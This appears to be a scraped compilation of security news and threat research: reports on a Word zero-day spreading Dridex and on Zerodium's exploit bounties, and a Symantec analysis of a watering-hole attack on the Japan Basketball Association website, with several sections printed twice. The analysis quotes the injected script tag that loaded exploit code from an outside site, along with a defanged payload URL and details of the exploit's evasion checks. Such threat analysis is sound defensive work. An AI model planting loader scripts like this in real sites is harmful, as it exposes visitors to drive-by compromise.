Microsoft Word 0-day used to push dangerous Dridex malware on millions

Enlarge / A sample e-mail from Dridex campaign exploiting Microsoft Word zero-day. (credit: Proofpoint)
Booby-trapped documents exploiting a critical zero-day vulnerability in Microsoft Word have been sent to millions of people around the world in a…

Enlarge / A sample e-mail from Dridex campaign exploiting Microsoft Word zero-day. (credit: Proofpoint)

Booby-trapped documents exploiting a critical zero-day vulnerability in Microsoft Word have been sent to millions of people around the world in a blitz aimed at installing Dridex, currently one of the most dangerous bank fraud threats on the Internet.

As Ars reported on Saturday, the vulnerability is notable because it bypasses exploit mitigations built into Windows, doesn't require targets to enable macros, and works even against Windows 10, which is widely considered Microsoft's most secure operating system ever. The flaw is known to affect most or all Windows versions of Word, but so far no one has ruled out that exploits might also be possible against Mac versions. Researchers from security firms McAfee and FireEye warned that the malicious Word documents are being attached to e-mails but didn't reveal the scope or ultimate objective of the campaign.

In a blog post published Monday night, researchers from Proofpoint filled in some of the missing details, saying the exploit documents were sent to millions of recipients across numerous organizations that were primarily located in Australia. Proofpoint researchers wrote:

Read 3 remaining paragraphs | Comments

Microsoft Word 0-day used to push dangerous Dridex malware on millions

Enlarge / A sample e-mail from Dridex campaign exploiting Microsoft Word zero-day. (credit: Proofpoint)
Booby-trapped documents exploiting a critical zero-day vulnerability in Microsoft Word have been sent to millions of people around the world in a…

Enlarge / A sample e-mail from Dridex campaign exploiting Microsoft Word zero-day. (credit: Proofpoint)

Booby-trapped documents exploiting a critical zero-day vulnerability in Microsoft Word have been sent to millions of people around the world in a blitz aimed at installing Dridex, currently one of the most dangerous bank fraud threats on the Internet.

As Ars reported on Saturday, the vulnerability is notable because it bypasses exploit mitigations built into Windows, doesn't require targets to enable macros, and works even against Windows 10, which is widely considered Microsoft's most secure operating system ever. The flaw is known to affect most or all Windows versions of Word, but so far no one has ruled out that exploits might also be possible against Mac versions. Researchers from security firms McAfee and FireEye warned that the malicious Word documents are being attached to e-mails but didn't reveal the scope or ultimate objective of the campaign.

In a blog post published Monday night, researchers from Proofpoint filled in some of the missing details, saying the exploit documents were sent to millions of recipients across numerous organizations that were primarily located in Australia. Proofpoint researchers wrote:

Read 3 remaining paragraphs | Comments

iPhone exploit bounty surges to an eye-popping $1.5 million

Enlarge (credit: Antoine Taveneaux)
A controversial broker of security exploits is offering $1.5 million (£1.2 million) for attacks that work against fully patched iPhones and iPads, a bounty that’s triple the size of its previous one.
Zerodium als…

Enlarge (credit: Antoine Taveneaux)

A controversial broker of security exploits is offering $1.5 million (£1.2 million) for attacks that work against fully patched iPhones and iPads, a bounty that's triple the size of its previous one.

Zerodium also doubled, to $200,000, the amount it will pay for attacks that exploit previously unknown vulnerabilities in Google's competing Android operating system, and the group raised the amount for so-called zeroday exploits in Adobe's Flash media player to $80,000 from $50,000. After buying the working exploits, the company then sells them to government entities, which use them to spy on suspected criminals, terrorists, enemies, and other targets.

Last year, Zerodium offered $1 million for iOS exploits, up to a total of $3 million. It dropped the price to $500,000 after receiving and paying for three qualifying submissions. On Thursday, Zerodium founder Chaouki Bekrar said the higher prices are a response to improvements the software makers—Apple and Google in particular—have devised that make their wares considerably harder to compromise.

Read 7 remaining paragraphs | Comments

Operation Backdoor Cut Targeted Basketball Community with IE Zero-Day

Back in March, Symantec blogged about a possible watering hole campaign exploiting a zero-day vulnerability for Internet Explorer 8, the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324). We continued our investigation into this attack, which we dubbed Operation Backdoor Cut, and have concluded that the focus of the attack was to target users associated with the Japanese basketball community. We drew this conclusion from our extended observation of the watering hole campaign abusing the vulnerability being solely hosted on the landing page of the official Japan Basketball Association (JBA) website. No other attacks on any other websites have been confirmed from our telemetry since the disclosure of the zero-day attack in March.

figure1_21.png
Figure 1. JBA landing page

The JBA website was originally compromised in mid-February to host a malicious script in the site’s HTML code that loaded exploit code from an external site in the background. The site appeared to be cleaned up afterwards; however, it was compromised again in late February to host a similar script. Then, yet again, malicious script was inserted just hours after the release of the patch for CVE-2014-0324 on Microsoft Patch Tuesday back on March 11. In all three occasions, a short script was inserted in the JBA site in order to redirect traffic to another compromised website hosting the exploit code located in Seoul, South Korea. The following is an example of the script used in the attacks:

<script type=”text/javascript” src=”https://www.[REMOVED].kr/uc/inc_jba.php”></script>

The compromised website, associated with a major Korean Café chain, hosted the actual exploit code. In each of the three compromises, the files were stored in different directories on the site. This particular site was most likely chosen to host the main part of the attack due to it being a reputable business which would not be likely to draw suspicion from security products or services monitoring the organization’s network. The following is a list of the files contained in each directory:

  • inc_jba.php
  • inc_front_us-en.php
  • inc_front_ja-jp.php
  • inc_front-2007.php
  • inc_front-2010.php
  • inc-module.jpg

The short script inserted into the JBA website led to the file inc_jba.php. This file contains JavaScript that checks the targeted user’s computer environment things such as the operating system (OS) version, which Microsoft Office version is installed, and the language of the OS. The JavaScript also checks if the browser has ever visited the page before by using a cookie as a check. If the page has been visited before, the browser is not directed to the exploit code as a precaution in case the user is a security researcher. If the environment meets the specified conditions, the browser is redirected to one of four exploit pages. Each of the four variations of the exploit code has been prepared for different environments:

  • Windows XP – English (EN)
  • Windows XP – Japanese
  • Windows 7 with Office 2007 on a x86 computer
  • Windows 7 with Office 2010 on a x86 computer

If the exploit code is executed successfully, it downloads inc_module.jpg from the same directory and renders the file to acquire the URL of the ultimate payload. Although the file extension is .jpg, it is not an image file, but is actually a data file containing encrypted information about the location of the payload. The browser then redirects to another server located in Seoul, which we believe was prepared by the attacker using the SSL protocol to encrypt network traffic. The following is the URL of the Seoul-based server:

https://login[dot]imicrosoft[dot]org/feed

Interestingly, this site was maintained on a virtual private server (VPS) rented from a company located in Beijing that appears to specialize in providing VPS located in the Unites States and South Korea. It may be safe to assume that the provider was chosen because of the geo-location of the server. The geo-IP location of the server hosting the payload must have been vital to the campaign’s success.

figure2_20.png
Figure 2. Login screen of the VPS site

The attackers had either a strategy to close shop quickly to make their campaign short lived or some sophisticated evasion technique was implemented to prevent security researchers from downloading the payload. Either way, we were unable to acquire the payload from this server.

From our observations, we believe the motive of Operation Backdoor Cut was to solely draw traffic from the JBA watering hole site as no other websites appear to have been affected. The name of the malicious script file (inc_jba.php) and the name of the cookie (JBA20140312v2) used to count the number of accesses to the page, both disguise themselves to appear as part of the JBA page. Traffic from the JBA website accounted for all detections observed by Symantec for this exploit.

Targeting the Basketball Community
Some may wonder why the Japanese basketball community is being targeted. The sporting community has important ties with both the nation and its government and basketball is no different. The Japanese basketball community has a rather interesting connection with the Japanese government. The president of the JBA is the current Deputy Prime Minister and Minister of Finance in Japan. He also happens to be the former prime minister. A link such as this may perhaps be the motive for the watering hole attack on the JBA site. The website may have been considered a good entry point or gateway to the Japanese government.

The Olympics may be another motive. As a major sports organization, the JBA has close ties with the Tokyo Organizing Committee of the Olympic and Paralympic Games which is the organizing body of the Tokyo 2020 Olympics. It’s no secret that Olympic organizations are often targets of cyberespionage. For instance, data retrieved from an investigation in 2011 into an operation named Shady RAT revealed that several Olympic organizations were attacked and computers on their network were compromised; the Japan Olympic Committee (JOC) happened to be one of the victims. Last year, Japan won the bid for Tokyo to host the Olympic Games in 2020 and is now preparing for the event. The nation is well aware of the potential for cyberattacks when it comes to the prestigious event. The Japanese government, in fact, held a cybersecurity drill in March in preparation for the Olympics to be held six years from now. However, the attacks may have already begun and may have started long before this exercise was launched.

Sectors including government, manufacturing, and finance may be common targets; however, any industry could potentially be at risk of a targeted attack. It is important to realize this and protect networks accordingly. Organizations should be prepared and draw up plans in case attackers happen to intrude the network.

Symantec has the following protection in place to protect against the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324):

AV

IPS

Back in March, Symantec blogged about a possible watering hole campaign exploiting a zero-day vulnerability for Internet Explorer 8, the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324). We continued our investigation into this attack, which we dubbed Operation Backdoor Cut, and have concluded that the focus of the attack was to target users associated with the Japanese basketball community. We drew this conclusion from our extended observation of the watering hole campaign abusing the vulnerability being solely hosted on the landing page of the official Japan Basketball Association (JBA) website. No other attacks on any other websites have been confirmed from our telemetry since the disclosure of the zero-day attack in March.

figure1_21.png
Figure 1. JBA landing page

The JBA website was originally compromised in mid-February to host a malicious script in the site’s HTML code that loaded exploit code from an external site in the background. The site appeared to be cleaned up afterwards; however, it was compromised again in late February to host a similar script. Then, yet again, malicious script was inserted just hours after the release of the patch for CVE-2014-0324 on Microsoft Patch Tuesday back on March 11. In all three occasions, a short script was inserted in the JBA site in order to redirect traffic to another compromised website hosting the exploit code located in Seoul, South Korea. The following is an example of the script used in the attacks:

<script type="text/javascript" src="https://www.[REMOVED].kr/uc/inc_jba.php"></script>

The compromised website, associated with a major Korean Café chain, hosted the actual exploit code. In each of the three compromises, the files were stored in different directories on the site. This particular site was most likely chosen to host the main part of the attack due to it being a reputable business which would not be likely to draw suspicion from security products or services monitoring the organization’s network. The following is a list of the files contained in each directory:

  • inc_jba.php
  • inc_front_us-en.php
  • inc_front_ja-jp.php
  • inc_front-2007.php
  • inc_front-2010.php
  • inc-module.jpg

The short script inserted into the JBA website led to the file inc_jba.php. This file contains JavaScript that checks the targeted user’s computer environment things such as the operating system (OS) version, which Microsoft Office version is installed, and the language of the OS. The JavaScript also checks if the browser has ever visited the page before by using a cookie as a check. If the page has been visited before, the browser is not directed to the exploit code as a precaution in case the user is a security researcher. If the environment meets the specified conditions, the browser is redirected to one of four exploit pages. Each of the four variations of the exploit code has been prepared for different environments:

  • Windows XP – English (EN)
  • Windows XP - Japanese
  • Windows 7 with Office 2007 on a x86 computer
  • Windows 7 with Office 2010 on a x86 computer

If the exploit code is executed successfully, it downloads inc_module.jpg from the same directory and renders the file to acquire the URL of the ultimate payload. Although the file extension is .jpg, it is not an image file, but is actually a data file containing encrypted information about the location of the payload. The browser then redirects to another server located in Seoul, which we believe was prepared by the attacker using the SSL protocol to encrypt network traffic. The following is the URL of the Seoul-based server:

https://login[dot]imicrosoft[dot]org/feed

Interestingly, this site was maintained on a virtual private server (VPS) rented from a company located in Beijing that appears to specialize in providing VPS located in the Unites States and South Korea. It may be safe to assume that the provider was chosen because of the geo-location of the server. The geo-IP location of the server hosting the payload must have been vital to the campaign’s success.

figure2_20.png
Figure 2. Login screen of the VPS site

The attackers had either a strategy to close shop quickly to make their campaign short lived or some sophisticated evasion technique was implemented to prevent security researchers from downloading the payload. Either way, we were unable to acquire the payload from this server.

From our observations, we believe the motive of Operation Backdoor Cut was to solely draw traffic from the JBA watering hole site as no other websites appear to have been affected. The name of the malicious script file (inc_jba.php) and the name of the cookie (JBA20140312v2) used to count the number of accesses to the page, both disguise themselves to appear as part of the JBA page. Traffic from the JBA website accounted for all detections observed by Symantec for this exploit.

Targeting the Basketball Community
Some may wonder why the Japanese basketball community is being targeted. The sporting community has important ties with both the nation and its government and basketball is no different. The Japanese basketball community has a rather interesting connection with the Japanese government. The president of the JBA is the current Deputy Prime Minister and Minister of Finance in Japan. He also happens to be the former prime minister. A link such as this may perhaps be the motive for the watering hole attack on the JBA site. The website may have been considered a good entry point or gateway to the Japanese government.

The Olympics may be another motive. As a major sports organization, the JBA has close ties with the Tokyo Organizing Committee of the Olympic and Paralympic Games which is the organizing body of the Tokyo 2020 Olympics. It’s no secret that Olympic organizations are often targets of cyberespionage. For instance, data retrieved from an investigation in 2011 into an operation named Shady RAT revealed that several Olympic organizations were attacked and computers on their network were compromised; the Japan Olympic Committee (JOC) happened to be one of the victims. Last year, Japan won the bid for Tokyo to host the Olympic Games in 2020 and is now preparing for the event. The nation is well aware of the potential for cyberattacks when it comes to the prestigious event. The Japanese government, in fact, held a cybersecurity drill in March in preparation for the Olympics to be held six years from now. However, the attacks may have already begun and may have started long before this exercise was launched.

Sectors including government, manufacturing, and finance may be common targets; however, any industry could potentially be at risk of a targeted attack. It is important to realize this and protect networks accordingly. Organizations should be prepared and draw up plans in case attackers happen to intrude the network.

Symantec has the following protection in place to protect against the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324):

AV

IPS